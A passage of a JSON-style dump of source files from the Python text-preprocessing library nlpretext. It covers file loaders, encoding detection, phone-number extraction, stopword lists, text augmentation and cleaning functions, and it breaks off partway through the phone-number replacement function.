    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/_utils/daskloader.py",
    "content": "# mypy: disable-error-code=\"attr-defined\"\nfrom typing import List, Union\n\nimport dask.bag as db\nimport dask.dataframe as dd\n\n\ndef read_text(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()\n\n\ndef read_json(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_json(files_path, encoding=encoding)\n\n\ndef read_csv(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_csv(files_path, encoding=encoding)\n\n\ndef read_parquet(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_parquet(files_path, encoding=encoding)\n"
  },
  {
    "path": "nlpretext/_utils/file_loader.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"assignment\"\n\nfrom typing import List, Union\n\nimport chardet\nfrom nlpretext._config import constants\n\n\ndef detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:\n    \"\"\"\n    Predict a file's encoding using chardet.\n\n    Parameters\n    ----------\n    file_path_or_string : string\n        if filepath, will open the file. Otherwise will predict from the string\n    n_lines : int\n        number of line to predict from\n\n    Returns\n    -------\n    string\n        the code of the detected encoding\n    \"\"\"\n    if isinstance(file_path_or_string, bytes):\n        rawdata = file_path_or_string\n    else:\n        with open(file_path_or_string, \"rb\") as f:\n            rawdata = b\"\".join([f.readline() for _ in range(n_lines)])\n    chardet_value: str = chardet.detect(rawdata)\n    return chardet_value\n\n\ndef check_text_file_format(filepath: Union[str, List[str]]) -> str:\n    \"\"\"\n    Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.\n\n    Parameters\n    ----------\n    filepath : str | list(str)\n        A filepath with wildcard (eg. *.txt), or a list of filepaths.\n\n    Returns\n    -------\n    str\n        Format of the specified file path, among .json, .csv, .parquet or .txt\n    \"\"\"\n    pattern = constants.TEXT_FILE_FORMATS_PATTERN\n    if not isinstance(filepath, (list, tuple)):\n        filepath = [filepath]\n    format_re_list = [pattern.match(path) for path in filepath]\n    format_list = [format_re.group(1) for format_re in format_re_list if format_re]\n    if len(set(format_list)) > 1:\n        raise ValueError(f\"Multiple file formats found in file path list: {format_list}\")\n    if None in format_re_list:\n        raise ValueError(\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\"  # noqa: E501\n        )\n    file_format = format_list[0]\n    return file_format\n"
  },
  {
    "path": "nlpretext/_utils/pandasloader.py",
    "content": "from typing import List, Union\n\nimport pandas as pd\nfrom fsspec import open_files\n\n\ndef _list_handler(func):\n    def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame:  # type: ignore\n        list_files = open_files(file_path)\n        list_df = [func(file.path, *args, **kwargs) for file in list_files]\n        df = pd.concat(list_df)\n        return df\n\n    return wrapper_list_handler\n\n\n@_list_handler\ndef read_text(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])\n    return df\n\n\n@_list_handler\ndef read_json(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_json(file_path, encoding=encoding)\n    return df\n\n\n@_list_handler\ndef read_csv(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_csv(file_path, encoding=encoding)\n    return df\n\n\n@_list_handler\ndef read_parquet(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_parquet(file_path, encoding=encoding)\n    return df\n"
  },
  {
    "path": "nlpretext/_utils/phone_number.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nfrom typing import List, Optional\n\nimport phonenumbers as _phonenumbers\nfrom nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY\n\n\ndef find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:\n    \"\"\"\n    Python port of Google's libphonenumber.\n    https://github.com/daviddrysdale/python-phonenumbers.\n\n    Parameters\n    ----------\n    region_code : str, optional\n        If specified, will find the number of the specified country.\n    eg. 06.00.00.00.00 if \"FR\" is specified.\n\n    If not specified, only works for international-formatted phone numbers.\n    - ie. phone number with +country code specified\n    eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.\n    supported value: look SUPPORTED_COUNTRY variable.\n\n    Returns\n    -------\n    list\n        list of matched phone numbers.\n\n    Raises\n    ------\n    ValueError\n        if country code is not supported.\n    \"\"\"\n    if region_code not in SUPPORTED_COUNTRY:\n        raise ValueError(\"Please enter a valid contry code. See SUPPORTED_COUNTRY list.\")\n    return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]\n\n\ndef extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:\n    \"\"\"\n    Find phone numbers in a text, returns a list of phone numbers.\n\n    Parameters\n    ----------\n    text : str\n    countrylist : list (eg. [None,'FR','US','GB'])\n        Look for phone numbers formatted according to the specified countlist.\n        supported value: look SUPPORTED_COUNTRY variable.\n\n    Returns\n    -------\n    list\n        List of unique phone numbers found.\n    \"\"\"\n    all_phone_numbers: List[str] = []\n    for country in countrylist:\n        new_numbers_founds = find_phone_numbers(text, region_code=country)\n        all_phone_numbers.extend(new_numbers_founds)\n    return list(set(all_phone_numbers))\n\n\nclass PhoneParser:\n    \"\"\"\n    Python port of Google's libphonenumber.\n    https://github.com/daviddrysdale/python-phonenumbers.\n    \"\"\"\n\n    def __init__(self):\n        self.region_code = None\n        self.text = None\n        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None\n\n    @property\n    def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:\n        return self.__parsed_num\n\n    @parsed_num.setter\n    def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:\n        self.__parsed_num = value\n\n    def parse_number(\n        self, text: str, region_code: Optional[str] = None\n    ) -> Optional[_phonenumbers.PhoneNumber]:\n        \"\"\"\n        Extract phone number from text.\n\n        Parameters\n        ----------\n        text: str\n        region_code : str, optional\n            If specified, will find the number of the specified country.\n        eg. 06.00.00.00.00 if \"FR\" is specified.\n        If not specified, only works for international-formatted phone numbers.\n        - ie. phone number with +country code specified\n        eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.\n        supported value: look SUPPORTED_COUNTRY variable.\n\n        Returns\n        -------\n        str\n            The parsed number\n\n        Raises\n        ------\n        NumberParseException\n            If the string doesn't contains phone number of is the parser fails.\n        \"\"\"\n        self.region_code = region_code\n        self.text = text\n        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(\n            self.text, self.region_code\n        )\n        return self.parsed_num\n\n    def format_number(self, num_format: str) -> str:\n        \"\"\"\n        Convert a phone number to another standard format.\n\n        Parameters\n        ----------\n        num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}\n\n        Returns\n        -------\n        str\n            Number formatted\n        \"\"\"\n        standard_format = FORMAT_NUMBERS.get(num_format)\n        if standard_format is None:\n            raise ValueError(f\"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}\")\n        if self.parsed_num is None:\n            raise ValueError(f\"Could not parse phone number {self.parsed_num}\")\n        formatted_number: Optional[str] = _phonenumbers.format_number(\n            self.parsed_num, standard_format\n        )\n        if formatted_number is None:\n            raise ValueError(f\"Could not format phone number {formatted_number}\")\n        return formatted_number\n"
  },
  {
    "path": "nlpretext/_utils/stopwords.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List\n\nfrom nlpretext._config.stopwords import STOPWORDS\nfrom stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING\nfrom stop_words import get_stop_words as _get_stop_words\n\n\ndef get_stopwords(lang: str = \"en\") -> List[str]:\n    \"\"\"Input a language code, returns a list of stopwords for the specified language.\n\n    Parameters\n    ----------\n    lang : str\n        Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',\n         'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',\n         'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',\n         'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',\n          'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',\n          'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',\n           'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']\n\n    Returns\n    -------\n    list\n        list of stopwords for a given language\n\n    Raises\n    ------\n    ValueError\n        When language is not available yet or incorrect country code\n    \"\"\"\n    if isinstance(lang, str) and len(lang) == 2:\n        lang = lang.lower()\n        custom_stopwords = STOPWORDS\n        stopwords = []\n\n        supported_lang_lib = list(_LANGUAGE_MAPPING.keys())\n        supported_lang_custom = list(custom_stopwords.keys())\n        supported_lang = supported_lang_lib + supported_lang_custom\n        if lang in supported_lang:\n            if lang in supported_lang_lib:\n                stopwords += _get_stop_words(lang)\n            if lang in supported_lang_custom:\n                stopwords += custom_stopwords[lang]\n        else:\n            raise ValueError(\n                \"Language not available yet or incorrect country code.\"\n                f\" Supported languages: {supported_lang}\"\n            )\n    else:\n        raise ValueError('Please input a valid country code, in 2 letters. Eg. \"us\" for USA. ')\n    return list(set(stopwords))\n"
  },
  {
    "path": "nlpretext/augmentation/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/augmentation/text_augmentation.py",
    "content": "from typing import Any, Dict, List, Optional, Tuple\n\nimport logging\nimport re\nfrom itertools import combinations\n\nimport nlpaug.augmenter.word as naw\n\n\nclass CouldNotAugment(ValueError):  # noqa: D101\n    pass\n\n\nclass UnavailableAugmenter(ValueError):  # noqa: D101\n    pass\n\n\ndef augment_text(\n    text: str,\n    method: str,\n    stopwords: Optional[List[str]] = None,\n    entities: Optional[List[Dict[str, Any]]] = None,\n) -> Tuple[str, List[Dict[str, Any]]]:\n    \"\"\"\n    Given a text with or without associated entities, generate a new text by\n    modifying some words in the initial one, modifications depend on the chosen\n    method (substitution with synonym, addition, deletion). If entities are\n    given as input, they will remain unchanged. If you want some words other\n    than entities to remain unchanged, specify it within the stopwords argument.\n\n    Parameters\n    ----------\n    text : string\n    method : {'wordnet_synonym', 'aug_sub_bert'}\n        augmenter to use ('wordnet_synonym' or 'aug_sub_bert')\n    stopwords : list, optional\n        list of words to freeze throughout the augmentation\n    entities : list, optional\n        entities associated to text if any, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n\n    Returns\n    -------\n    Augmented text and optional augmented entities\n    \"\"\"\n    augmenter = get_augmenter(method, stopwords)\n    augmented_text = augmenter.augment(text)\n    if entities is not None:\n        return process_entities_and_text(entities, text, augmented_text)\n    return augmented_text, []\n\n\ndef process_entities_and_text(\n    entities: List[Dict[str, Any]], text: str, augmented_text: str\n) -> Tuple[str, List[Dict[str, Any]]]:\n    \"\"\"\n    Given a list of initial entities, verify that they have not been altered by\n    the data augmentation operation and are still in the augmented text.\n\n    Parameters\n    ----------\n    entities: list\n        entities associated to text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n    text: str\n        initial text\n    augmented_text: str\n        new text resulting of data augmentation operation\n\n    Returns\n    -------\n    Augmented text and entities with their updated position in augmented text\n    \"\"\"\n    formatted_entities = [\n        (\n            text[entities[i][\"startCharIndex\"] : entities[i][\"endCharIndex\"]].strip(),\n            entities[i][\"entity\"],\n        )\n        for i in range(len(entities))\n    ]\n    if are_entities_in_augmented_text(entities, augmented_text):\n        augmented_entities = get_augmented_entities(augmented_text, formatted_entities)\n        clean_entities = clean_sentence_entities(augmented_text, augmented_entities)\n        return augmented_text, clean_entities\n    raise CouldNotAugment(\"Text was not correctly augmented because entities were altered\")\n\n\ndef are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:\n    \"\"\"\n    Given a list of entities, check if all the words associated to each entity\n    are still present in augmented text.\n\n    Parameters\n    ----------\n    entities : list\n        entities associated to initial text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n    augmented_text : str\n\n    Returns\n    -------\n    True if all entities are present in augmented text, False otherwise\n    \"\"\"\n    check = True\n    for ent in entities:\n        if ent[\"word\"] not in augmented_text:\n            check = False\n            return check\n    return check\n\n\ndef get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:\n    \"\"\"\n    Initialize an augmenter depending on the given method.\n\n    Parameters\n    ----------\n    method : str (supported methods: wordnet_synonym and aug_sub_bert)\n    stopwords : list\n        list of words to freeze throughout the augmentation\n\n    Returns\n    -------\n    Initialized nlpaug augmenter\n    \"\"\"\n    if method == \"wordnet_synonym\":\n        return naw.SynonymAug(aug_src=\"wordnet\", stopwords=stopwords)\n    if method == \"aug_sub_bert\":\n        return naw.ContextualWordEmbsAug(\n            model_path=\"bert-base-uncased\", action=\"substitute\", stopwords=stopwords\n        )\n    raise UnavailableAugmenter(\n        \"The given augmenter is not supported. You must choose one \\\n        of the following: wordnet_synonym or aug_sub_bert\"\n    )\n\n\ndef get_augmented_entities(\n    sentence_augmented: str, entities: List[Tuple[str, Any]]\n) -> List[Dict[str, Any]]:\n    \"\"\"\n    Get entities with updated positions (start and end) in augmented text.\n\n    Parameters\n    ----------\n    sentence_augmented : str\n        augmented text\n    entities : list\n        entities associated to initial text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n\n    Returns\n    -------\n    Entities with updated positions related to augmented text\n    \"\"\"\n    entities_augmented = []\n    for entity in entities:\n        search = re.search(entity[0].strip(), sentence_augmented)\n        if search:\n            start_index = search.start()\n            end_index = search.end()\n            new_entity = {\n                \"entity\": entity[1],\n                \"word\": sentence_augmented[start_index:end_index],\n                \"startCharIndex\": start_index,\n                \"endCharIndex\": end_index,\n            }\n            entities_augmented.append(new_entity)\n    return entities_augmented\n\n\ndef clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n    \"\"\"\n    Paired entities check to remove nested entities, the longest entity is kept.\n\n    Parameters\n    ----------\n    text : str\n        augmented text\n    entities : list\n        entities associated to augmented text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n\n    Returns\n    -------\n    Cleaned entities\n    \"\"\"\n    entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]\n    for element1, element2 in combinations(entities_to_clean, 2):\n        result = check_interval_included(element1, element2)\n        if result is not None:\n            try:\n                entities_to_clean.remove(result[0])\n            except IndexError:\n                logging.warning(\n                    \"Cant remove entity : {} \\n entities are now :{} \\n for sentence : {} \".format(\n                        result, entities_to_clean, text\n                    )\n                )\n                continue\n    return entities_to_clean\n\n\ndef check_interval_included(\n    element1: Dict[str, Any], element2: Dict[str, Any]\n) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:\n    \"\"\"\n    Comparison of two entities on start and end positions to find if they are nested.\n\n    Parameters\n    ----------\n    element1 : dict\n    element2 : dict\n        both of them in the following format\n        {\n            'entity': str,\n            'word': str,\n            'startCharIndex': int,\n            'endCharIndex': int\n        }\n\n    Returns\n    -------\n    If there is an entity to remove among the two returns a tuple\n    (element to remove, element to keep).\n    If not, returns None\n    \"\"\"\n    if (\n        (element1 != element2)\n        and (element1[\"startCharIndex\"] >= element2[\"startCharIndex\"])\n        and (element1[\"endCharIndex\"] <= element2[\"endCharIndex\"])\n    ):\n        return element1, element2\n    if (\n        (element1 != element2)\n        and (element2[\"startCharIndex\"] >= element1[\"startCharIndex\"])\n        and (element2[\"endCharIndex\"] <= element1[\"endCharIndex\"])\n    ):\n        return element2, element1\n    if (\n        (element1 != element2)\n        and (element1[\"startCharIndex\"] >= element2[\"startCharIndex\"])\n        and (element1[\"endCharIndex\"] >= element2[\"endCharIndex\"])\n        and (element1[\"startCharIndex\"] <= element2[\"endCharIndex\"] - 1)\n    ):\n        return element1, element2\n    if (\n        (element1 != element2)\n        and (element2[\"startCharIndex\"] >= element1[\"startCharIndex\"])\n        and (element2[\"endCharIndex\"] >= element1[\"endCharIndex\"])\n        and (element2[\"startCharIndex\"] < element1[\"endCharIndex\"] - 1)\n    ):\n        return element2, element1\n    return None\n"
  },
  {
    "path": "nlpretext/basic/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/basic/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Optional\n\nimport re\nimport unicodedata\n\nfrom flashtext import KeywordProcessor\nfrom ftfy import fix_text as _fix_text\nfrom nlpretext._config import constants\nfrom nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers\nfrom nlpretext._utils.stopwords import get_stopwords\nfrom nlpretext.token.tokenizer import tokenize\n\n\ndef normalize_whitespace(text: str) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Given ``text`` str, replace one or more spacings with a single space, and\n    one or more linebreaks with a single newline. Also strip leading/trailing\n    whitespace.\n    eg. \"   foo  bar  \" -> \"foo bar\"\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.NONBREAKING_SPACE_REGEX.sub(\n        \" \", constants.LINEBREAK_REGEX.sub(r\"\\n\", text)\n    ).strip()\n    return text\n\n\ndef remove_whitespace(text: str) -> str:\n    \"\"\"\n    Given ``text`` str, remove one or more spacings and linebreaks.\n    Also strip leading/trailing whitespace.\n    eg. \"   foo  bar  \" -> \"foobar\".\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return constants.NONBREAKING_SPACE_REGEX.sub(\n        \"\", constants.LINEBREAK_REGEX.sub(\"\", text)\n    ).strip()\n\n\ndef lower_text(text: str) -> str:\n    \"\"\"\n    Given ``text`` str, transform it into lowercase.\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return text.lower()\n\n\ndef filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:\n    \"\"\"\n    Given ``token`` str and a list of groups of words\n    that were concatenated into tokens, reverses the tokens\n    to their ungrouped state.\n\n    Parameters\n    ----------\n    token : string\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if ignored_stopwords:\n        for group in ignored_stopwords:\n            if token == remove_whitespace(group):\n                token = group\n    return token\n\n\ndef ungroup_ignored_stopwords(\n    tokens: List[str], ignored_stopwords: Optional[List[str]] = None\n) -> List[str]:\n    \"\"\"\n    Given ``tokens`` list of str and a list of groups of words\n    that are concatenated in tokens, reverses the tokens to\n    their ungrouped state.\n\n    Parameters\n    ----------\n    tokens : list of strings\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    list of strings\n    \"\"\"\n    return [filter_groups(token, ignored_stopwords) for token in tokens]\n\n\ndef remove_stopwords(\n    text: str,\n    lang: str,\n    custom_stopwords: Optional[List[str]] = None,\n    ignored_stopwords: Optional[List[str]] = None,\n) -> str:\n    \"\"\"\n    Given ``text`` str, remove classic stopwords for a given language and\n    custom stopwords given as a list. Words and groups of words from\n    ignored_stopwords list are ignored during stopwords removal.\n\n    Parameters\n    ----------\n    text : string\n    lang : string\n    custom_stopwords : list of strings\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    string\n\n    Raises\n    ------\n    ValueError\n        if ``custom_stopwords``  and ``ignored_stopwords`` have common elements.\n    \"\"\"\n    if custom_stopwords and ignored_stopwords:\n        common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))\n        if common_elements != set():\n            raise ValueError(\n                f\"Found common words in custom_stopwords and ignored_stopwords: \\\n                {common_elements}. Please remove duplicated values.\"\n            )\n    stopwords = get_stopwords(lang)\n    if ignored_stopwords:\n        keyword_processor = KeywordProcessor()\n        singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]\n        for group_of_words in ignored_stopwords:\n            keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))\n        text = keyword_processor.replace_keywords(text)\n    else:\n        singletons_to_keep = []\n    if custom_stopwords:\n        stopwords += custom_stopwords\n    if not text:\n        raise ValueError(\"Found empty text. Please fix it before using this function.\")\n    if lang in [\"fr\", \"en\"]:\n        lang_module = {\"fr\": \"fr_spacy\", \"en\": \"en_spacy\"}[lang]\n        tokens = tokenize(text, lang_module)\n    else:\n        tokens = text.split()\n    tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]\n    tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)\n    return \" \".join(tokens)\n\n\ndef remove_eol_characters(text: str) -> str:\n    r\"\"\"\n    Remove end of line (\\n) char.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n    \"\"\"\n    text = text.replace(\"\\n\", \" \")\n    return text\n\n\ndef fix_bad_unicode(text: str, normalization: str = \"NFC\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Fix unicode text that's \"broken\" using `ftfy\n    <http://ftfy.readthedocs.org/>`_;\n    this includes mojibake, HTML entities and other code cruft,\n    and non-standard forms for display purposes.\n\n    Parameters\n    ----------\n    text : string\n\n    normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):\n        if 'NFC', combines characters and diacritics written using separate\n        code points, e.g. converting \"e\" plus an acute accent modifier into\n        \"é\"; unicode\n        can be converted to NFC form without any change in its meaning!\n        if 'NFKC', additional normalizations are applied that can change\n        the meanings of characters, e.g. ellipsis characters will be replaced\n        with three periods\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = _fix_text(text, normalization=normalization)\n    return text\n\n\ndef unpack_english_contractions(text: str) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace *English* contractions in ``text`` str with their unshortened\n    forms.\n    N.B. The \"'d\" and \"'s\" forms are ambiguous (had/would, is/has/possessive),\n    so are left as-is.\n    eg. \"You're fired. She's nice.\" -> \"You are fired. She's nice.\"\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    # standard\n    text = constants.CONTRACTION_NT_NOT.sub(\n        r\"\\1\\2 not\",\n        text,\n    )\n    text = constants.CONTRACTION_LL_WILL.sub(\n        r\"\\1\\2 will\",\n        text,\n    )\n    text = constants.CONTRACTION_RE_ARE.sub(r\"\\1\\2 are\", text)\n    text = constants.CONTRACTION_VE_HAVE.sub(\n        r\"\\1\\2 have\",\n        text,\n    )\n    text = constants.CONTRACTION_CANT_CANNOT.sub(r\"\\1\\2n not\", text)\n    text = constants.CONTRACTION_M_AM.sub(r\"\\1\\2 am\", text)\n    text = constants.CONTRACTION_LET_LETUS.sub(r\"\\1\\2 us\", text)\n    text = constants.CONTRACTION_WONT_WILLNOT.sub(r\"\\1\\2ill not\", text)\n    text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r\"\\1\\2hall not\", text)\n    text = constants.CONTRACTION_YALL_YOUALL.sub(r\"\\1\\2ou all\", text)\n    return text\n\n\ndef replace_urls(text: str, replace_with: str = \"*URL*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all URLs in ``text`` str with ``replace_with`` str.\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the URL to be replaced with.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))\n    return text\n\n\ndef replace_emails(text: str, replace_with: str = \"*EMAIL*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all emails in ``text`` str with ``replace_with`` str\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the email address to be replaced with.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.EMAIL_REGEX.sub(replace_with, text)\n    return text\n\n\ndef replace_phone_numbers(\n    text: str,\n    country_to_detect: List[Optional[str]],\n    replace_with: str = \"*PHONE*\",\n    method: str = \"regex\",\n) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Inspired code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all phone numbers in ``text`` str with ``replace_with`` str\n\n    Parameters\n    ----------\n    text : string\n    replace_with : string\n        the string you want the phone number to be replaced with.\n    method : ['regex','detection']\n        regex is faster but will omit a lot of numbers, while detection will\n        catch every numbers, but takes a while.\n    country_to_detect : list\n        If a list of country code is specified, will catch every number\n        formatted.\n        Only when method = 'detection'.\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if method == \"regex\":\n        text = constants.PHONE_REGEX.sub(replace_with, text)\n    elif method == \"detection\":\n        found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)\n\n        # 